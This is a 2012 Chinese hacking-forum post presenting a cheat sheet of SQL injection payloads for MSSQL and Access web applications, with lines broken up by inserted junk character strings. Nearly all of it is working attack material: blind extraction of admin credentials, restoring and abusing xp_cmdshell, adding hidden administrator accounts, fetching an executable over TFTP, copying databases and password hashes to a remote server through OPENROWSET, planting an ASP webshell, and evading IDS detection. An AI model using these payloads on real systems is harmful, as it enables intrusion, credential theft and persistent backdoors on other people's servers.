中国网络渗透测试联盟

标题: SQL注入语句2 [打印本页]
作者: admin    时间: 2012-9-15 14:32
标题: SQL注入语句2
1..判断有无注入点 ! o% q5 G8 i6 G/ @* K  G* ]
; and 1=1 and 1=2
# u- U  E% i; l
; K( S3 o, a" M; z  d9 B: z- W( Q# H) J" @! |
2.猜表一般的表的名称无非是admin adminuser user pass password 等.. - J/ v; J9 @/ h5 m4 L" v' C4 G2 p) L
and 0<>(select count(*) from *) ! _+ e/ p6 ]  _0 U* [$ |
and 0<>(select count(*) from admin) ---判断是否存在admin这张表 % q  B2 t# ^- s) ^8 [" v. u" ?

; }4 }/ I2 a  l) Q
2 Y* A; F: x% x. i$ q3 @3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 6 n( w: d: d& h
and 0<(select count(*) from admin)
* [- ]0 H% H4 N5 n: pand 1<(select count(*) from admin) + j4 J; z. Y+ E) O6 v$ d
猜列名还有 and (select count(列名) from 表名)>02 M0 ]5 Y/ h' S" ^
  C: w. r# b( ?; y/ ^! i' B

$ w0 K. \6 q4 Y& @) _. `5 T# U* I4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. 1 p. [+ e' |; H+ t. D8 T* C$ @
and 1=(select count(*) from admin where len(*)>0)-- 8 j  H7 i2 k5 D9 z# F
and 1=(select count(*) from admin where len(用户字段名称name)>0) 4 {9 a; K2 T9 W2 G3 \) Z" U  x
and 1=(select count(*) from admin where len(密码字段名称password)>0)
* h+ o' P7 C" Q! n& y& I2 J( C2 N3 x, X! y$ s8 E: F0 N/ R  c
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 2 U' b# \& r1 E. \+ \& G6 o) x
and 1=(select count(*) from admin where len(*)>0) ! y' f6 \* J! y; _, c2 M; a' Z( u# j
and 1=(select count(*) from admin where len(name)>6) 错误 . ~/ a* P4 o- R$ l7 \# x% A1 {  l
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
. v& N: v4 s- }and 1=(select count(*) from admin where len(name)=6) 正确
9 }0 y( ^0 Y2 {/ I1 `; C- z; ]( G, L* g# l6 v5 O) T/ e
and 1=(select count(*) from admin where len(password)>11) 正确
9 }' q6 j4 u" W5 j9 y! K& Mand 1=(select count(*) from admin where len(password)>12) 错误 长度是12
8 ]! s% u0 I4 ?' Jand 1=(select count(*) from admin where len(password)=12) 正确
: U* o0 U7 h7 l猜长度还有 and (select top 1 len(username) from admin)>5$ l2 P% a; G" P( ?5 \0 Y
( w; C8 s; J) E9 u
6 R% S- o! K+ K0 e/ ~/ X  y2 B3 U
6.猜解字符
* r% \2 d8 E' g% s: \and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
7 A& K/ @9 ]8 `6 m; rand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
  V* X4 L6 ^. l" g+ U5 U就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
0 }$ s" c- c. Y1 D0 v
) C+ s; L. J( C- R( `猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算
9 x, v* A! W& [3 y- Q; k  F. `and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 6 b' `* |3 n, L8 E/ L  }
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. - i. m" k- I* ?6 f# L# x" x
# K. ^, I& [8 S, |/ @- r; Y8 g3 v
group by users.id having 1=1-- ) f& X0 X( K4 U7 {8 G: y- h$ ~$ Y
group by users.id, users.username, users.password, users.privs having 1=1--
9 e6 L3 f2 a9 Y/ M0 Q- g1 s) |# f6 k! J; insert into users values( 666, attacker, foobar, 0xffff )-- 8 O+ _3 B# x2 P7 R* z& v* F

( k) F( K, t. i  LUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- ( B$ Q' f, h8 t- |1 t& o8 R; g/ c
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
8 i  m* W1 \2 v. w  R+ J$ {( YUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- 2 g6 l  E$ V* h' g3 k( M
UNION SELECT TOP 1 login_name FROM logintable-
7 n# k6 G' d2 s- E7 ^; _2 uUNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
; [: _8 o2 i7 [1 s+ ?* Z& K0 W. G  H3 C( A
看服务器打的补丁=出错了打了SP4补丁
0 N1 M2 x$ V7 F9 Eand 1=(select @@VERSION)--
8 q. N' a) f+ }. N
; |2 t" s" F; A2 M  J看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
0 j8 ?* |  v+ ^and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
0 G2 u; C$ n8 s- R8 A7 s! {2 I  b0 y9 i
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) ; G% k3 _: Z# F4 U' p
and sa=(SELECT System_user)--
- M  F  f* u' s$ R0 W0 \, N  Y; Zand user_name()=dbo--
  i" G, k# y" B' uand 0<>(select user_name()--
# d1 S' t8 P% b) Q1 a5 |$ E" n, F" Q! z! |- P3 L8 C6 m, T
看xp_cmdshell是否删除 " I3 W; y" J% }) t: ]5 b% C/ W$ s
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)-- 6 w/ r2 L% t) {% K2 a

+ S0 A( u7 M/ I: Xxp_cmdshell被删除,恢复,支持绝对路径的恢复 ; T& d& i" P$ M- m1 ~. [2 e
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
. w. R0 r; H3 X/ };EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
/ _$ v, v4 r( i8 E4 r' p5 B: M
) g& i& e3 Y' {! ]反向PING自己实验
- x5 N7 J5 s: M0 A;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
( X2 J$ j) C  R+ E: L
# F( ]4 f3 W( r2 [3 [5 I. V+ l, m加帐号
5 X% z% q5 m" S, K0 U; T2 ^$ R1 D;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
, z. ?2 @( m- L& [- T; r( P' y' _# e: p# C5 O
创建一个虚拟目录E盘:
! f3 V4 z2 U* E; ]+ X! p;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
. E, F- }7 X/ s% n- ?5 N- [/ ?0 S
1 q2 |3 B1 Z( |; L访问属性:(配合写入一个webshell) 6 U2 p5 a9 }1 ~+ v- y
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse 4 T* w6 {% I0 \# m& x% c5 U

7 B& O9 j# F  n
# h7 d& w5 S& J9 l4 v% k; yMSSQL也可以用联合查询( P- `7 @2 N+ k' A/ G
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 3 R  F) r$ ~4 V6 O
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用) ' ~& e+ Z. _1 m( ]6 u- Q8 Y9 @
# Q9 M/ d6 |* v: h
8 U( I/ T. ]" d& [# w6 i$ a8 t% m
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 * i6 J6 G4 E0 }& H& M, o# s
- a  \, T* u' c5 l5 z* Y" O
$ r2 u, u# v+ ~5 g' H4 O

7 t6 E8 Z8 C# P6 L7 ?, Z$ d9 f2 Q! X得到WEB路径
& I. _7 e8 @( p) n$ C;create table [dbo].[swap] ([swappass][char](255));-- 8 a: W. O8 O; o/ S
and (select top 1 swappass from swap)=1-- 1 x; E8 q7 m9 n5 W  D
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- 2 s% o3 Y9 }' ~9 O: X, t& s
;use ku1;-- " K% H1 q" X( H  W- I
;create table cmd (str image);-- 建立image类型的表cmd
( g, _9 I0 ]: m2 l1 ?* K
; h! [& a& [: L) K- j5 r2 c: a% l$ ]( p存在xp_cmdshell的测试过程:
; E3 |; F0 @# D( |. ]0 c3 b;exec master..xp_cmdshell dir 6 l/ `$ _4 A- m# N: q& q
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
! m6 c: ]" U/ f4 L* A* l1 h;exec master.dbo.sp_password null,jiaoniang$,1866574;--
2 M2 s7 Q( [- X9 H* \% ~4 X;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
( g3 y; d) p: M  w0 P;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
! y6 |9 z% d4 R: N9 V;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
/ Z- I& `4 K, M7 Uexec master..xp_servicecontrol start, schedule 启动服务 ) z( ^7 n* E2 Y5 |
exec master..xp_servicecontrol start, server
* N5 y: W/ p' v( Z% s; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
- m9 b! A2 O' e7 N5 I1 |" I;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
5 S, U; v4 f; \( G( E9 {2 p; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 6 H! N5 ~+ T5 x# P8 L8 J

. |/ M2 n9 M% p3 a4 V;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ 7 `+ P9 z: J  l. `. ^, q1 Y9 R
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
# Z1 J/ K2 s6 T. U8 J;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat . m( a5 c) H( {
如果被限制则可以。 $ E+ Z) f2 f2 Y
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
* i9 K3 U  I1 {" A
0 M; o* \9 v* _& g# d9 ^3 h: v* _查询构造:
9 O( Z. f9 H7 q6 m/ HSELECT * FROM news WHERE id=... AND topic=... AND ..... & d6 B1 Z- M( g
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
" \2 [, k! Z+ \, K+ U) xselect 123;--
' I1 [  J. Q3 z. }3 h6 b4 g+ \3 f;use master;-- ! i. A4 c0 \7 h" \: e' [2 g& G8 E& c) \
:a or name like fff%;-- 显示有一个叫ffff的用户哈。 9 a- p4 A2 R, G' M
and 1<>(select count(email) from [user]);-- / z& c0 W% j  s3 U
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
6 Y  z1 O9 y4 U;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
# R" t& T/ J) d: I% M;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
# U5 K9 q3 {# `2 s3 ?;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- 4 [2 d% L$ f7 q  U
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- 9 P! C4 j# |1 D& U
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- * I2 F9 b( E" ~0 @- Y3 v# w1 n% V
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 $ n6 @/ z5 K$ T) o) r2 w
通过查看ffff的用户资料可得第一个用表叫ad 5 b# W2 h/ i4 Z* K' m9 l* t, @
然后根据表名ad得到这个表的ID 得到第二个表的名字 $ V4 u" |3 J5 D3 @7 A

1 n" i5 W# w: R1 d/ E8 Dinsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- ! i. g2 ?+ q, K: W9 e
insert into users values( 667,123,123,0xffff)-- ! E7 b1 y- |/ V1 |8 s4 _
insert into users values ( 123, admin--, password, 0xffff)-- 4 P" t0 u$ ]0 K1 l/ R
;and user>0
/ g4 @6 Z) g5 S  k1 p: v;and (select count(*) from sysobjects)>0 - ?+ g3 t8 K8 ~+ t2 \& S7 z$ C3 V3 I
;and (select count(*) from mysysobjects)>0 //为access数据库
3 q  N3 O: e% _0 }: g+ Z% q: ?3 {2 B" f  \
枚举出数据表名 + E4 v/ {- @; f
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
& s' d" l5 U. E# I4 w. J这是将第一个表名更新到aaa的字段处。
1 H* ?, L3 ~$ D" M读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
! U6 {% L+ [! P7 N& u;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
8 L, K- s& h. U然后id=1552 and exists(select * from aaa where aaa>5) 2 C+ }: R$ N5 V$ l, s5 d" R
读出第二个表,一个个的读出,直到没有为止。 5 F# P+ }) A; e8 {
读字段是这样: 4 ^7 X3 S; r0 ~( d6 }' i( f
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- 9 h4 k: E$ V7 x9 _, E
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
+ D" T. ?3 H/ x/ F;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- 1 d/ l# T1 S  y. k2 \
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
% R3 m! g0 A1 N- K. h
+ N8 y& c$ L0 @4 o! s; q[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] - ?/ w) V7 @- c' }: }6 b
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
. {- n: ?. ~* z. Q) i9 V5 l; k! S通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] & D3 x( Q, i6 E

. M; |, z' _# B( @) R[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名] $ A8 {/ k. I' _! B# ~
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] - |4 h) g, M% c7 ?( m
! M, P2 x6 W% b7 ?9 i6 H" e
绕过IDS的检测[使用变量] : ^1 j, `2 |6 w# r; E$ w
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ ) l) X; i7 J$ G  G
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
, o. m* p4 p: Q1 R( R2 J5 s2 e. j4 }; y  U& C" r
1、 开启远程数据库 5 ^7 W2 o4 O& E+ M. R% K
基本语法 - {+ s) w* d$ j' x6 Q
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
% h0 k+ ]9 B+ C8 w参数: (1) OLEDB Provider name 0 n5 f4 w' B4 v" |( w) @5 [
2、 其中连接字符串参数可以是任何端口用来连接,比如 , l7 `' x9 ]; G0 x5 \5 @$ {& C
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
" q5 q) I1 i9 Y; `; K( ?3.复制目标主机的整个数据库insert所有远程表到本地表。
6 j$ A  v" D# \: @4 x* x2 _
9 K; q. W# L* i+ J. {基本语法: : q( L( L. I* Q% J/ f. `
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 5 I4 S  g  H9 r. x9 ?
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
9 O0 N2 J' T4 {2 h1 p( V) _! Uinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 ( O& L+ _6 W; J
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
  j1 o( @. A- i/ [select * from master.dbo.sysdatabases
& x* S% v% c$ S0 s7 Cinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects) & Q. B3 H3 R# N% N; D
select * from user_database.dbo.sysobjects 0 m& W6 H- i1 j( Y) y6 F* C
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
+ g+ N& |! ~6 V; tselect * from user_database.dbo.syscolumns - P. E. Q0 B; p6 k  a
复制数据库:
7 [0 A( ~+ @8 U2 ?3 e8 @insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 : \- ?; d. v+ O) l0 e
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 : d0 |4 M& X0 `1 S: q' x  r5 ?6 ?

! o% S- V+ Z8 D0 S* Q+ X复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: # {. S8 I& _9 S& A0 _4 R5 C
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
4 f& G. V2 p; S/ B9 U得到hash之后,就可以进行暴力破解。
5 }  b- k0 O. o8 V2 W, w5 _2 \5 @/ p
遍历目录的方法: 先创建一个临时表:temp
1 t& T  \6 I) d, J# O;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
% o7 n2 \) t+ w: G/ p) S( }. Q* `9 B;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 6 `# u* t. X3 r3 |' B: f8 S
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
* z( ~* Z9 }' a; m# W;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
. G: p9 I/ R  L4 |;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
' w: P- d2 q4 B3 ^% Y, y4 b+ Z;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
0 w+ T8 u( v, Z! _;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
7 z! b+ y5 i* r* x1 |4 F4 x( q;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc : y, D6 L3 c5 [
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
+ A( K' i9 v8 C写入表: # o! E* _0 S* \( k9 V
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- ' l6 t9 ~; |' @" v% w1 C1 G
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
0 M  \5 O# ~) h- Y% j6 R语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));-- 5 Y/ i) S! ^  @: P% {9 U
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 5 _) Q3 f/ ]. R' I  `  n
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
/ o. B2 G6 t2 D8 T  E! d语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
: d; Q# Y; n5 c4 B8 [. a1 j语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
5 m( O' ]% h/ M0 v3 `语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- ! X' T& d8 ?+ e6 m' J7 W9 E
语句9:and 1=(SELECT IS_MEMBER(db_owner));--
! E% o9 n; V! w8 r
4 T4 s1 m+ T# s* {5 e把路径写到表中去: 4 I9 ]" Z7 D" q8 Q& J
;create table dirs(paths varchar(100), id int)-- * p# i2 F( _3 F% q7 x9 d! w0 N
;insert dirs exec master.dbo.xp_dirtree c:\--
6 ~# v& X1 r2 Y' wand 0<>(select top 1 paths from dirs)--
7 j# G" t0 O& _; i9 Hand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
5 V! N+ M% G1 [: F+ S9 V- ^;create table dirs1(paths varchar(100), id int)--
. M; F- Q0 K3 g5 ], x6 q;insert dirs exec master.dbo.xp_dirtree e:\web--
3 d' e+ ?0 m1 Hand 0<>(select top 1 paths from dirs1)--
8 D5 m# E2 ^* }3 g3 Z! u* m/ L
. Y2 D; w  [) Z0 X/ Z把数据库备份到网页目录:下载
' D% D, ~- c$ C;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
( ]( r6 i' {8 c& q2 L2 Q% F8 I4 H8 v" [
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) + I9 b: i5 x( ^& [0 q
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 ( G" {8 ?: P0 g- N' M$ t* a
and 1=(select user_id from USER_LOGIN) 9 u7 j, a& Z+ o; z+ Q3 `+ T7 }
and 0=(select user from USER_LOGIN where user>1)
8 u1 j1 i0 J, |: `' U% I, e
( O! {1 V+ h. N2 L; A-=- wscript.shell example -=- / v) {0 C* s% Q* e" k
declare @o int 7 Z2 v9 H/ f8 c
exec sp_oacreate wscript.shell, @o out $ w. Y3 _* C# Z# R- w( h; D0 j
exec sp_oamethod @o, run, NULL, notepad.exe
- J. j! B) F' O* I# q: E: @7 O/ S/ I; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe-- % f/ `* ?# U7 Z4 H( u2 I( u
3 {* V. T$ ^4 G1 a* ~, m0 Y( M
declare @o int, @f int, @t int, @ret int ! H+ Z: |/ m/ n7 z/ D( m: D
declare @line varchar(8000)
. |, y. ^4 E3 Z) G: _# S( U2 Sexec sp_oacreate scripting.filesystemobject, @o out
8 C5 G0 {, N- O1 O, W% E- xexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 / n" B% t7 B- r" K* @/ u' h4 k
exec @ret = sp_oamethod @f, readline, @line out # z/ j7 b- u: D; i; |& u2 e) u
while( @ret = 0 ) 6 }3 L* r+ I% F: s8 c$ U$ Z3 ~7 V0 O
begin
$ y% s% J6 f* uprint @line % ]9 E) J; R  O& P
exec @ret = sp_oamethod @f, readline, @line out ! \3 _4 q# \0 K4 u" ?
end
3 c$ P0 Y4 n) d; v, S3 M' i
% `+ `+ Y3 W$ Jdeclare @o int, @f int, @t int, @ret int $ S: O- Z" g, A! o3 Y1 k
exec sp_oacreate scripting.filesystemobject, @o out 4 }& J" X: Y% _
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
& M. E2 y' j4 ^- ?" o. j8 a4 M$ w0 i0 Aexec @ret = sp_oamethod @f, writeline, NULL,
' T2 r. u+ Z/ a<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %> 2 T( U4 n0 `" I9 I
/ q7 Y# p. z+ S% Y
declare @o int, @ret int
, Z( J2 U" n1 E' k: yexec sp_oacreate speech.voicetext, @o out 0 D+ ^2 Z4 m' K9 i7 g
exec sp_oamethod @o, register, NULL, foo, bar   Z5 I  \& v0 A* X/ c, n" p
exec sp_oasetproperty @o, speed, 150
1 l9 i; }. ?% A; D) {2 ]8 a8 jexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 : @( P% T/ e/ o/ A0 q& o  B
waitfor delay 00:00:05 % A0 S, \) [' s0 c( N( \# b+ i
4 O6 m9 e: D; Q0 `% y
; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
# _# W: t2 t3 R. u% s+ ?+ Y7 E
  I* K3 T/ ]; v" Txp_dirtree适用权限PUBLIC
# l) I  B$ D) p8 B2 rexec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
  ~. J3 R5 d7 i2 rcreate table dirs(paths varchar(100), id int)
5 B2 x- U  Z0 K2 P: m1 o1 ^建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 2 D. Z3 z6 p, g# l
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
7 y# t( K/ t. S0 F: z3 I4 q$ J



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2